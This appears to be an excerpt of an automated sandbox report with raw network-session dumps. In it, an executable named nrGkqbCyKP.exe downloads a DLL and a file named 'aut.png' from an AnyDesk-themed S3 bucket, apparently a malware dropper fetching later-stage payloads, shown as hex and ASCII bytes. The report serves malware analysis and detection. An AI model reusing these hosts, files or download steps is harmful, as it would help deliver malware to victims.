                                                                                                                                                                          2024-12-18 12:06:22 UTC16384INData Raw: fe 00 00 00 f2 0f 10 4d 10 66 0f 2f c1 76 13 0f 57 0d e8 f1 04 00 bb 01 00 00 00 f2 0f 11 4d 10 eb 03 0f b7 df f2 0f 10 05 49 a2 08 00 66 0f 2f c1 77 70 f2 0f 10 15 bb f1 04 00 66 0f 2f d1 76 2f f2 0f 59 c9 48 8d 15 72 f4 04 00 41 b8 07 00 00 00 0f 28 c1 0f 28 f1 e8 1d f6 ff ff f2 0f 59 75 10 0f 28 c8 f2 0f 59 ce f2 0f 58 4d 10 eb 33 f2 0f 10 05 0e a2 08 00 48 8d 4d 10 41 83 c8 ff 66 0f 2f c1 76 23 0f 28 ca e8 b0 f4 ff ff f2 0f 10 4d 10 f2 0f 10 05 53 f1 04 00 f2 0f 5e c1 f2 0f 5c c8 f2 0f 59 cf eb 2a 0f 28 cf e8 8d f4 ff ff 0f bf c8 85 c9 74 0c 83 f9 01 75 11 b9 08 00 00 00 eb 05 b9 10 00 00 00 e8 d0 e5 ff ff f2 0f 10 4d 10 66 85 db 74 07 0f 57 0d 1f f1 04 00 0f 28 c1 eb 3a f2 0f 10 45 10 eb 33 66 0f 2e 3d 7b f1 04 00 7a 16 75 14 b8 00 80 00 00 66 85 45
                                                                                                                                                                          Data Ascii: Mf/vWMIf/wpf/v/YHrA((Yu(YXM3HMAf/v#(MS^\Y*(tuMftW(:E3f.={zufE
                                                                                                                                                                          2024-12-18 12:06:22 UTC1024INData Raw: 81 c4 80 00 00 00 5d c3 cc cc cc cc cc cc 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b ca e8 4f ff ff ff 90 b8 01 00 00 00 48 83 c4 38 c3 48 89 5c 24 10 57 48 83 ec 20 48 83 61 08 00 49 8b f8 48 83 61 10 00 48 8b d9 c7 01 63 73 6d e0 c7 41 04 01 00 00 00 c7 41 18 04 00 00 00 c7 41 20 20 05 93 19 48 89 51 28 4d 85 c0 74 11 41 f6 00 10 74 0b 48 8b 02 48 8b 48 f8 48 8b 79 30 48 8d 54 24 30 48 89 7b 30 48 8b cf ff 15 57 93 04 00 48 89 44 24 30 48 89 43 38 48 85 ff 74 11 f6 07 08 75 05 48 85 c0 75 07 c7 43 20 00 40 99 01 48 8b c3 48 8b 5c 24 38 48 83 c4 20 5f c3 cc cc 40 55 48 81 ec 00 01 00 00 48 8d 6c 24 30 48 89 9d e8 00 00 00 48 89 b5 f0 00 00 00 48 89 bd f8 00 00 00 48 8b 05 be 62 08 00 48 33 c5 48 89 85 c0 00 00 00 48 8b f9 48 85 c9 75 1a 48 8d 4d 00 e8
                                                                                                                                                                          Data Ascii: ]H8HD$ HOH8H\$WH HaIHaHcsmAAA HQ(MtAtHHHHy0HT$0H{0HWHD$0HC8HtuHuC @HH\$8H _@UHHl$0HHHHbH3HHHuHM
                                                                                                                                                                          2024-12-18 12:06:22 UTC16384INData Raw: 24 20 48 89 03 48 89 53 08 48 85 d2 74 40 83 c8 ff f0 0f c1 42 08 83 f8 01 75 33 48 8b 5c 24 28 48 8b cb 48 8b 03 48 8b 00 ff 15 8f 93 04 00 83 c8 ff f0 0f c1 43 0c 83 f8 01 75 12 48 8b 4c 24 28 48 8b 01 48 8b 40 08 ff 15 70 93 04 00 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc 33 d2 e9 dd f7 ff ff cc cc cc cc cc cc cc cc cc 48 83 ec 28 e8 27 f2 ff ff 48 8b c8 e8 3f fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b 02 4c 8b 01 48 89 01 4c 89 02 48 8b 42 08 4c 8b 41 08 48 89 41 08 4c 89 42 08 c3 cc cc cc 48 83 39 00 0f 95 c0 c3 cc cc cc cc cc cc cc cc 48 83 79 08 00 48 8d 05 fc b2 04 00 48 0f 45 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 53 56 57 41 54 41 55 41 56 48 83 ec 60 48 8d 6c 24 30 48 8b 05 ad 5e 08 00 48 33 c5 48 89 45
                                                                                                                                                                          Data Ascii: $ HHSHt@Bu3H\$(HHHCuHL$(HH@pH0[3H('H?HLHLHBLAHALBH9HyHHEA@USVWATAUAVH`Hl$0H^H3HE
                                                                                                                                                                          2024-12-18 12:06:22 UTC1024INData Raw: 8b 44 24 40 48 8b cb e8 b2 02 00 00 90 48 8b 54 24 48 48 83 fa 10 72 35 48 ff c2 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 97 51 04 00 cc e8 71 f8 03 00 48 83 67 10 00 48 83 67 18 00 0f 10 03 0f 11 07 0f 10 4b 10 0f 11 4f 10 48 83 63 10 00 be 0f 00 00 00 48 89 73 18 c6 03 00 48 83 63 10 00 48 89 73 18 c6 03 00 48 8b c7 48 8b 4c 24 50 48 33 cc e8 cc f7 03 00 48 83 c4 60 5f 5e 5b c3 cc cc cc cc 48 8b 41 40 33 d2 48 39 10 74 06 48 8b 41 58 8b 10 48 63 c2 c3 cc cc cc cc cc cc cc cc cc cc cc 48 8b 41 58 ff 08 48 8b 51 40 48 8b 02 48 8d 48 01 48 89 0a c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 8b 41 20 48 8b d9 85 c0 7e 0c 48 8b 49 18 ff 15 0e 50 04 00 eb 0b 79 09 48 8b 49
                                                                                                                                                                          Data Ascii: D$@HHT$HHr5HHL$0HHrH'HIH+HHvQqHgHgKOHcHsHcHsHHL$PH3H`_^[HA@3H9tHAXHcHAXHQ@HHHH@SH A H~HIPyHI
                                                                                                                                                                          2024-12-18 12:06:22 UTC1749INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 75 06 48 83 c4 60 5b c3 a8 04 74 09 48 8d 1d 54 b3 04 00 eb 14 a8 02 48 8d 1d 61 b3 04 00 48 8d 05 72 b3 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 b7 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 57 d9 ff ff 48 8d 15 58 20 06 00 48 8d 4c 24 30 e8 3c 04 04 00 cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 74 07 45 84 c0 74 12 eb 06 48 83 c4 60 5b c3 33 d2 33 c9 e8 0d 04 04 00 cc a8 04 74 09 48 8d 1d d3 b2 04 00 eb 14 a8 02 48 8d 1d e0 b2 04 00 48 8d 05 f1 b2 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 36 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 d6 d8 ff ff 48 8d 15 d7 1f 06 00 48 8d 4c 24 30 e8 bb 03 04 00 cc cc cc cc cc e9
                                                                                                                                                                          Data Ascii: @SH`AQ#uH`[tHTHaHrHDHL$ LHL$0HWHX HL$0<@SH`AQ#tEtH`[33tHHHHDHL$ 6LHL$0HHHL$0
                                                                                                                                                                          2024-12-18 12:06:22 UTC16384INData Raw: 24 b0 00 00 00 49 8b c4 49 3b c5 0f 84 de 00 00 00 41 8a 02 3c 80 73 10 44 0f b6 c0 49 8d 42 01 48 89 03 e9 8c 00 00 00 3c c0 0f 82 20 01 00 00 44 0f b6 c0 3c e0 73 0c 41 83 e0 1f 41 b9 01 00 00 00 eb 2d 3c f0 73 0c 41 83 e0 0f 41 b9 02 00 00 00 eb 1d 3c f8 73 0c 41 83 e0 07 41 b9 03 00 00 00 eb 0d 41 83 e0 03 3c fc 45 1b c9 41 83 c1 05 49 8b d7 41 8d 49 01 49 2b d2 48 3b d1 7c 6f 49 ff c2 4c 89 13 41 8a 02 2c 80 3c 3f 0f 87 c4 00 00 00 41 0f b6 0a 41 8b c0 83 e1 3f c1 e0 06 41 ff c9 44 8b c1 44 0b c0 49 ff c2 4c 89 13 45 85 c9 7f d2 40 38 3e 75 13 c6 06 01 41 f6 46 14 04 74 09 41 81 f8 ff fe 00 00 74 4a 45 39 46 10 0f 82 81 00 00 00 49 8b 03 44 89 00 49 83 03 04 4c 8b 13 49 8b 03 4d 3b d7 0f 85 19 ff ff ff 49 3b ea 40 0f 94 c7 8b c7 4c 8d 5c 24 50 49 8b
                                                                                                                                                                          Data Ascii: $II;A<sDIBH< D<sAA-<sAA<sAAA<EAIAII+H;|oILA,<?AA?ADDILE@8>uAFtAtJE9FIDILIM;I;@L\$PI
                                                                                                                                                                          2024-12-18 12:06:22 UTC1024INData Raw: 10 ff 15 e2 08 04 00 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc cc cc cc 48 8d 05 89 d4 07 00 c3 cc cc cc cc cc cc cc cc 8b 05 7a d4 07 00 85 c0 78 04 ff c0 eb 05 b8 01 00 00 00 89 05 67 d4 07 00 c3 cc cc cc cc cc cc 48 83 ec 28 83 2d 55 d4 07 00 01 75 33 48 8b 0d ac f8 07 00 48 85 c9 74 05 e8 02 01 00 00 48 8b 0d a3 f8 07 00 48 85 c9 74 05 e8 f1 00 00 00 48 8b 0d 82 f8 07 00 48 85 c9 74 05 e8 e0 00 00 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 60 48 c7 44 24 20 fe ff ff ff 48 8b d9 48 8b 01 48 63 48 04 83 7c 19 10 00 75 48 f6 44 19 18 02 74 41 48 8b 4c 19 48 48 8b 01 48 8b 40 68 ff 15 17 08 04 00 83 f8 ff 75 2a 48 8b 03 48 63 50 04 48 03 d3 8b 4a 10 8b c1 83 c8 04 48 83 7a 48 00 0f 44 c8 83 e1 13 83 c9 04 89 4a 10 8b 42 14 23 c1
                                                                                                                                                                          Data Ascii: H0[HzxgH(-Uu3HHtHHtHHtH(@SH`HD$ HHHcH|uHDtAHLHHH@hu*HHcPHJHzHDJB#
                                                                                                                                                                          2024-12-18 12:06:22 UTC16384INData Raw: 50 8b 10 eb 02 33 d2 85 d2 7e 06 41 0f b6 00 eb 0d 48 8b 01 48 8b 40 30 ff 15 cb 04 04 00 83 f8 ff 74 06 41 88 46 09 eb 04 49 83 26 00 41 c6 46 08 01 41 8a 46 09 42 38 04 3f 75 0c b1 01 88 4c 24 20 eb 31 89 6c 24 24 48 8d 54 24 38 49 83 fd 10 48 0f 43 d3 b9 7f 00 00 00 4c 3b e1 41 0f b6 c4 0f 42 c8 88 0c 2a 48 8b 5c 24 38 4c 8b 6c 24 50 8a 4c 24 20 48 ff c5 48 3b ee 0f 82 0c ff ff ff 84 c9 0f 84 be fe ff ff 48 8b 54 24 28 49 8b ce e8 43 5d 00 00 84 c0 0f 85 a9 fe ff ff 49 ff c4 49 8b ce e8 8c 33 00 00 83 4c 24 24 ff e9 85 fe ff ff 48 8b cb e8 2e a9 03 00 8b 44 24 24 48 8b 4c 24 58 48 33 cc e8 bd a8 03 00 48 8b 9c 24 b8 00 00 00 48 83 c4 60 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 56 41 57 48 83 ec 20 48 bb
                                                                                                                                                                          Data Ascii: P3~AHH@0tAFI&AFAFB8?uL$ 1l$$HT$8IHCL;AB*H\$8Ll$PL$ HH;HT$(IC]II3L$$H.D$$HL$XH3H$H`A_A^A]A\_^]H\$Hl$Ht$WAVAWH H


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          3192.168.2.8497193.5.237.1704431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:25 UTC78OUTGET /VCRUNTIME140.dll HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:26 UTC438INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: p94mufkVfvm70mcHLn1T+lqTWkYUs5m4aSm2immRZS/HpEE0jv7hnblVo4N+5JEl6k1MbQNh3yMtHeCn6LWevg==
                                                                                                                                                                          x-amz-request-id: V3QZP8AW1MF4G0F8
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:26 GMT
                                                                                                                                                                          Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                                                                                                          ETag: "e9b690fbe5c4b96871214379659dd928"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 119376
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 4e 0d a3 8c 2f 63 f0 8c 2f 63 f0 8c 2f 63 f0 5f 5d 62 f1 8e 2f 63 f0 85 57 f0 f0 87 2f 63 f0 8c 2f 62 f0 a1 2f 63 f0 8c 2f 63 f0 8d 2f 63 f0 8a ae 60 f1 99 2f 63 f0 8a ae 67 f1 9c 2f 63 f0 8a ae 66 f1 93 2f 63 f0 8a ae 63 f1 8d 2f 63 f0 8a ae 9c f0 8d 2f 63 f0 8a ae 61 f1 8d 2f 63 f0 52 69 63 68 8c 2f 63 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N/c/c/c_]b/cW/c/b/c/c/c`/cg/cf/cc/c/ca/cRich/c
                                                                                                                                                                          2024-12-18 12:06:26 UTC586INData Raw: 48 89 5c 24 08 57 48 83 ec 20 48 8d 05 47 e8 00 00 48 8b f9 48 89 01 8b da 48 83 c1 08 e8 de 1c 00 00 f6 c3 01 74 0d ba 18 00 00 00 48 8b cf e8 e8 bb 00 00 48 8b 5c 24 30 48 8b c7 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 48 8b f9 45 33 ff 44 89 7c 24 20 44 21 bc 24 b0 00 00 00 4c 21 7c 24 28 4c 21 bc 24 c8 00 00 00 e8 c3 21 00 00 4c 8b 68 28 4c 89 6c 24 40 e8 b5 21 00 00 48 8b 40 20 48 89 84 24 c0 00 00 00 48 8b 77 50 48 89 b4 24 b8 00 00 00 48 8b 47 48 48 89 44 24 30 48 8b 5f 40 48 8b 47 30 48 89 44 24 48 4c 8b 77 28 4c 89 74 24 50 48 8b cb e8 ae d4 ff ff e8 71 21 00 00 48 89 70 20 e8 68 21 00 00 48 89 58 28 e8 5f 21 00 00 48 8b 50 20 48 8b 52 28 48 8d 4c 24 60 e8 45 b6 00 00 4c 8b e0 48
                                                                                                                                                                          Data Ascii: H\$WH HGHHHtHH\$0HH _@SVWATAUAVAWHpHE3D|$ D!$L!|$(L!$!Lh(Ll$@!H@ H$HwPH$HGHHD$0H_@HG0HD$HLw(Lt$PHq!Hp h!HX(_!HP HR(HL$`ELH
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: 41 57 48 81 ec a8 00 00 00 48 8b f9 45 33 e4 44 89 64 24 20 44 21 a4 24 f0 00 00 00 4c 21 64 24 28 4c 21 64 24 40 44 88 60 80 44 21 60 84 44 21 60 88 44 21 60 8c 44 21 60 90 44 21 60 94 e8 bb 1f 00 00 48 8b 40 28 48 89 44 24 38 e8 ad 1f 00 00 48 8b 40 20 48 89 44 24 30 48 8b 77 50 48 89 b4 24 f8 00 00 00 48 8b 5f 40 48 8b 47 30 48 89 44 24 50 4c 8b 7f 28 48 8b 47 48 48 89 44 24 70 48 8b 47 68 48 89 44 24 78 8b 47 78 89 84 24 e8 00 00 00 8b 47 38 89 84 24 e0 00 00 00 48 8b cb e8 91 d2 ff ff e8 54 1f 00 00 48 89 70 20 e8 4b 1f 00 00 48 89 58 28 e8 42 1f 00 00 48 8b 50 20 48 8b 52 28 48 8d 8c 24 88 00 00 00 e8 25 b4 00 00 4c 8b e8 48 89 44 24 48 4c 39 67 58 74 19 c7 84 24 f0 00 00 00 01 00 00 00 e8 0f 1f 00 00 48 8b 48 70 48 89 4c 24 40 41 b8 00 01 00 00 49
                                                                                                                                                                          Data Ascii: AWHHE3Dd$ D!$L!d$(L!d$@D`D!`D!`D!`D!`D!`H@(HD$8H@ HD$0HwPH$H_@HG0HD$PL(HGHHD$pHGhHD$xGx$G8$HTHp KHX(BHP HR(H$%LHD$HL9gXt$HHpHL$@AI
                                                                                                                                                                          2024-12-18 12:06:26 UTC1024INData Raw: 74 0a 48 8d 54 24 30 e8 a6 ed ff ff 48 8d 54 24 30 48 8b cb e8 7d ec ff ff 48 39 3d 36 f5 00 00 75 0c 83 63 08 00 48 83 23 00 c6 43 08 02 8a 4b 08 84 c9 0f 84 da fe ff ff eb 27 80 7b 08 01 7f 21 48 83 3b 00 48 8b cb 74 0e 48 8d 15 95 bc 00 00 e8 90 e5 ff ff eb 0a ba 01 00 00 00 e8 94 ea ff ff 48 8b 74 24 68 48 8b c3 48 8b 5c 24 60 48 83 c4 50 5f c3 cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 48 8b 05 cc f4 00 00 48 8b d9 80 38 58 0f 84 ef 00 00 00 80 38 5a 0f 84 a9 00 00 00 48 8d 4d e0 e8 4a fe ff ff 8b 4d e8 33 d2 84 c9 0f 85 87 00 00 00 48 8b 05 9a f4 00 00 38 10 74 7c 80 38 40 74 6d 80 38 5a 74 0f 89 53 08 c6 43 08 02 48 89 13 e9 da 00 00 00 48 ff c0 4c 8d 45 f0 48 89 05 6f f4 00 00 8b 05 79 f4 00 00 c1 e8 12 f7 d0 a8 01 74 10 48 8d 05 3d b8 00 00 c7 45
                                                                                                                                                                          Data Ascii: tHT$0HT$0H}H9=6ucH#CK'{!H;HtHHt$hHH\$`HP_H\$UHH@HH8X8ZHMJM3H8t|8@tm8ZtSCHHLEHoytH=E
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: 44 89 7d ef 48 8b d8 e8 06 fa ff ff 4c 8b c3 48 8d 55 07 48 8d 4d e7 e8 76 e7 ff ff 41 b0 5d 48 8d 55 27 48 8d 4d 07 e8 92 e7 ff ff 48 8b d0 48 8d 4d d7 e8 5e e8 ff ff 80 7d df 01 7e 99 4c 39 3f 74 62 f7 47 08 00 08 00 00 74 09 48 8d 55 27 48 8b cf eb 3a b2 28 4c 89 7d e7 48 8d 4d e7 44 89 7d ef e8 aa f9 ff ff 4c 8b c7 48 8d 55 07 48 8d 4d e7 e8 1a e7 ff ff 41 b0 29 48 8d 55 27 48 8d 4d 07 e8 36 e7 ff ff 48 8d 55 17 48 8b c8 4c 8d 45 d7 e8 fa e6 ff ff 48 8b 08 48 89 4d d7 8b 40 08 89 45 df 48 8d 55 d7 48 8d 4d f7 e8 54 32 00 00 8b 4d ff 48 8b 45 f7 0f ba e9 0b 41 89 4e 08 49 89 06 e9 a0 00 00 00 48 8d 4d e7 4c 89 7d e7 44 89 7d ef 4c 39 3a 74 5b b2 28 e8 31 f9 ff ff 4c 8b c7 48 8d 55 d7 48 8d 4d e7 e8 a1 e6 ff ff 48 8d 05 ee b5 00 00 c7 45 ff 02 00 00 00
                                                                                                                                                                          Data Ascii: D}HLHUHMvA]HU'HMHHM^}~L9?tbGtHU'H:(L}HMD}LHUHMA)HU'HM6HUHLEHHM@EHUHMT2MHEANIHML}D}L9:t[(1LHUHMHE
                                                                                                                                                                          2024-12-18 12:06:26 UTC1024INData Raw: c7 48 8d 55 20 48 8b c8 e8 85 a7 ff ff 48 8b 08 48 89 0f 8b 40 08 89 47 08 4c 8d 9c 24 40 02 00 00 48 8b c7 49 8b 5b 20 49 8b 73 28 49 8b 7b 30 49 8b e3 41 5e 41 5d 5d c3 cc 48 89 5c 24 08 4c 89 74 24 10 55 48 8b ec 48 83 ec 70 48 83 21 00 48 8b d9 83 61 08 00 45 33 c0 48 8d 4d c0 b2 01 e8 15 1b 00 00 4c 8d 35 ea 71 00 00 48 8b 10 48 89 13 48 8b ca 8b 40 08 89 43 08 80 7b 08 00 48 8b 05 d0 b0 00 00 75 59 80 38 00 74 54 80 38 40 74 54 48 8d 4d d0 e8 e7 fa ff ff 4c 89 75 b0 4c 8d 45 c0 c7 45 b8 02 00 00 00 48 8d 55 e0 0f 28 45 b0 48 8b c8 66 0f 7f 45 c0 e8 a7 a6 ff ff 4c 8b c3 48 8d 55 f0 48 8b c8 e8 c4 a6 ff ff 48 8b 08 48 89 0b 8b 40 08 89 43 08 48 8b 05 75 b0 00 00 80 38 40 75 0c 48 ff c0 48 89 05 66 b0 00 00 eb 74 80 38 00 74 0e 83 63 08 00 48 83 23 00
                                                                                                                                                                          Data Ascii: HU HHH@GL$@HI[ Is(I{0IA^A]]H\$Lt$UHHpH!HaE3HML5qHHH@C{HuY8tT8@tTHMLuLEEHU(EHfELHUHHH@CHu8@uHHft8tcH#
                                                                                                                                                                          2024-12-18 12:06:26 UTC1749INData Raw: 8d 05 e0 74 00 00 48 89 03 eb 27 48 ff c0 48 89 05 41 ad 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 40 5b c3 cc cc cc 40 53 48 83 ec 30 48 8b d9 48 8b 0d 08 ad 00 00 80 39 00 75 10 83 63 08 00 48 8d 05 88 74 00 00 48 89 03 eb 62 41 b8 04 00 00 00 48 8d 15 6a 6e 00 00 ff 15 c0 5a 00 00 85 c0 75 3f 48 83 05 d4 ac 00 00 04 44 8d 40 01 33 d2 48 8d 4c 24 20 e8 9c fe ff ff 48 8b 05 bd ac 00 00 80 38 40 75 1b 48 ff c0 48 89 05 ae ac 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 30 5b c3 40 53 48 83 ec 20 48 8b 05 7b ac 00 00 48 8b d9 80 38 3f 75 24 48 ff c0 80 38 24 75 09 b2 01 e8 48 02 00 00 eb 1d 45 33 c0 48 89 05 58 ac 00 00 33
                                                                                                                                                                          Data Ascii: tH'HHAHD$ HD$(CcH#CHH@[@SH0HH9ucHtHbAHjnZu?HD@3HL$ H8@uHHHD$ HD$(CcH#CHH0[@SH H{H8?u$H8$uHE3HX3
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: ff ff e9 10 03 00 00 b2 26 4c 89 75 e0 48 8d 4d e0 44 89 75 e8 e8 23 af ff ff 48 8d 4d b0 e8 0a c9 ff ff 4c 8b c0 48 8d 4d e0 48 8b d7 e8 8b 9c ff ff e9 e0 02 00 00 48 8b cf e8 6a f6 ff ff e9 d3 02 00 00 48 8d 05 c6 6d 00 00 44 89 77 08 48 89 07 e9 c0 02 00 00 48 8b cf e8 5a db ff ff e9 b3 02 00 00 8b ce 83 e9 37 74 53 83 e9 01 74 41 83 e9 09 74 2d 83 e9 01 74 28 83 e9 01 74 16 83 f9 02 0f 85 84 02 00 00 48 8b cf e8 9d c8 ff ff e9 82 02 00 00 48 8b cf e8 50 b2 ff ff e9 75 02 00 00 8b d6 48 8b cf e8 61 d3 ff ff e9 66 02 00 00 48 8b cf e8 80 e6 ff ff e9 59 02 00 00 48 8b cf e8 3f 0a 00 00 e9 4c 02 00 00 83 fe 50 0f 8f 18 02 00 00 0f 84 f4 01 00 00 8b ce 83 e9 47 74 50 83 e9 01 74 4b 83 e9 01 74 46 83 e9 01 74 41 83 e9 03 74 1c 83 f9 01 0f 85 0e 02 00 00 48
                                                                                                                                                                          Data Ascii: &LuHMDu#HMLHMHHjHmDwHHZ7tStAt-t(tHHPuHafHYH?LPGtPtKtFtAtH
                                                                                                                                                                          2024-12-18 12:06:26 UTC1024INData Raw: c4 20 5d c3 cc 40 55 48 83 ec 20 48 8b ea e8 16 51 ff ff 83 78 30 00 7e 08 e8 0b 51 ff ff ff 48 30 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 fb 0c ff ff 90 48 83 c4 30 5d c3 cc 40 55 48 83 ec 30 48 8b ea e8 dd 50 ff ff 83 78 30 00 7e 08 e8 d2 50 ff ff ff 48 30 48 83 c4 30 5d c3 cc 40 55 48 83 ec 20 48 8b ea 48 8b 4d 38 e8 6a e6 ff ff 90 48 83 c4 20 5d c3 cc cc cc cc cc cc cc 40 55 48 83 ec 20 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 20 5d c3 cc 40 55 48 83 ec 30 48 8b ea 48 8b 01 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 48 83 c4 30 5d c3 cc 48 8d 8a 70 00 00 00 e9 20 5b ff ff 40 55 48 83 ec 20 48 8b ea 33 c9 48 83 c4 20 5d e9 bb 4f ff ff cc 40 53 55 57 48 83 ec 40 48 8b ea 48 89 4d 50 48 89 4d 48 e8 2e 50 ff ff 48 8b 8d 80
                                                                                                                                                                          Data Ascii: ]@UH HQx0~QH0H ]@UH0HH0]@UH0HPx0~PH0H0]@UH HHM8jH ]@UH HH38H ]@UH0HH38H0]Hp [@UH H3H ]O@SUWH@HHMPHMH.PH
                                                                                                                                                                          2024-12-18 12:06:26 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          4192.168.2.8497203.5.237.1704431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:28 UTC69OUTGET /aut.png HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:29 UTC438INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: rI47jLMN1CC8G9tS3eze5uDGhiROnTNOcUzGTO1OPQu9kLNGBkczQZwHKpJA+X6uRnNl1SIuupAq1bmaeJTr2g==
                                                                                                                                                                          x-amz-request-id: QNYBCJF3CKBRBBJK
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:30 GMT
                                                                                                                                                                          Last-Modified: Fri, 13 Dec 2024 18:14:05 GMT
                                                                                                                                                                          ETag: "0ca6a22e9feadb18c76712b5b0256b96"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 660160
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:29 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 5d 00 00 01 86 08 02 00 00 00 ce f1 a3 0d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 11 74 45 58 74 53 6f 66 74 77 61 72 65 00 53 6e 69 70 61 73 74 65 5d 17 ce dd 00 00 20 00 49 44 41 54 78 9c ec bd 57 a2 24 3b 8e 25 08 d0 3d 7b cd b3 85 d9 62 ef a4 32 dc 70 e6 03 9a a4 89 2b e2 65 75 4f 31 5f de 30 37 a3 00 41 68 2a fe df ff ef ff 03 92 e3 23 44 20 22 62 26 22 26 ce 47 22 22 1e 63 10 31 40 96 8d a8 3e 33 33 b3 7e 25 22 10 6a 26 10 83 06 13 7b 65 4b 02 00 2f bc 4d 4c c4 cc 91 39 fe d6 87 8b 74 9b e3 35 06 33 8b 48 64 e6 02 18 20 06 06 5b 1f 14 98 02 12 69 16 f6 54 ca a2 94 5d 00 b3 0c 20 26 66 8a b2 db 9e e6 b3 0f 4c e4 1f 63 50 c5 4f 47 0e 00 c8 25 0e 98 06 8f ec f6 92
